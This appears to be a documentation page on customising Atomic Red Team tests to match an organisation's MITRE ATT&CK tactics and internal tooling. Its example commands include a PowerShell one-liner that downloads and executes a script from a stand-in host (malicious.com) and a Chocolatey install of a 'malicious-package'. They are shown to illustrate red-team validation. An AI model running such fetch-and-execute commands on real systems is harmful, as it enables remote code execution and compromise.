Customizing Techniques
The MITRE ATT&CK framework provides a structured taxonomy for adversarial behavior, but real-world environments often require customization to reflect unique organizational tactics, techniques, and procedures (TTPs). When leveraging Atomic Red Team tests, red teams must align these pre-defined techniques with an organization’s specific MITRE ATT&CK configuration, including custom tactics, modified techniques, or domain-specific indicators. This process ensures tests are both relevant and effective for validating defensive controls.
Mapping Atomic Techniques to Custom Tactics¶
Organizations may define unique tactics that differ from MITRE ATT&CK’s standard taxonomy. For example, a company might label a "Data Exfiltration" tactic as "Internal Data Transfer" to reflect internal compliance policies. To adapt Atomic tests:
- Identify the MITRE tactic the technique belongs to (e.g.,
Initial Access,Execution). - Map it to the organization’s custom tactic using the
tacticparameter in Atomic tests. - Update the test’s metadata to reflect the custom tactic.
Example:
# Original Atomic test (MITRE tactic: Initial Access)
tactic: Initial Access
technique: T1078
# Customized for an organization's "External Compromise" tactic
tactic: External Compromise
technique: T1078
This allows defenders to correlate alerts with the organization’s specific MITRE-like framework while retaining the technical validity of the test.
Modifying Techniques to Match Environment-Specific Behavior¶
Atomic tests often assume generic tools or behaviors (e.g., powershell.exe for execution). To align with an organization’s infrastructure:
- Replace tooling: Substitute commands or binaries used in the test to match internal tooling (e.g.,
chocolateyinstead ofpowershell). - Adjust parameters: Modify command-line arguments or payloads to reflect specific configurations.
Example:
# Original Atomic test command (uses PowerShell)
powershell.exe -Command "IEX (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"
# Customized for internal tooling (uses Chocolatey)
choco install -y malicious-package
This ensures the test mimics real-world adversary behavior within the target environment.
Validating Customizations Against MITRE ATT&CK¶
After customization, validate tests against the MITRE ATT&CK framework to ensure they remain actionable for defenders:
- Use MITRE’s ATT&CK Navigator to verify that the custom tactic/technique aligns with existing entries or falls under a broader category.
- Check for overlaps with other techniques to avoid redundancy.
- Document mappings for transparency between red and blue teams.
Example validation command:
# Query MITRE ATT&CK for technique T1078
curl "https://attack.mitre.org/techniques/T1078" | grep "description"
This step ensures customizations remain compatible with standard threat modeling practices.
Key takeaways¶
- Custom tactics require updating Atomic tests’ metadata to reflect organizational naming conventions.
- Environment-specific tooling must replace generic commands in Atomic tests for realism.
- Validation against MITRE ATT&CK ensures customizations remain useful for defensive analysis.
- Collaboration between red and blue teams is critical to align testing with organizational security postures.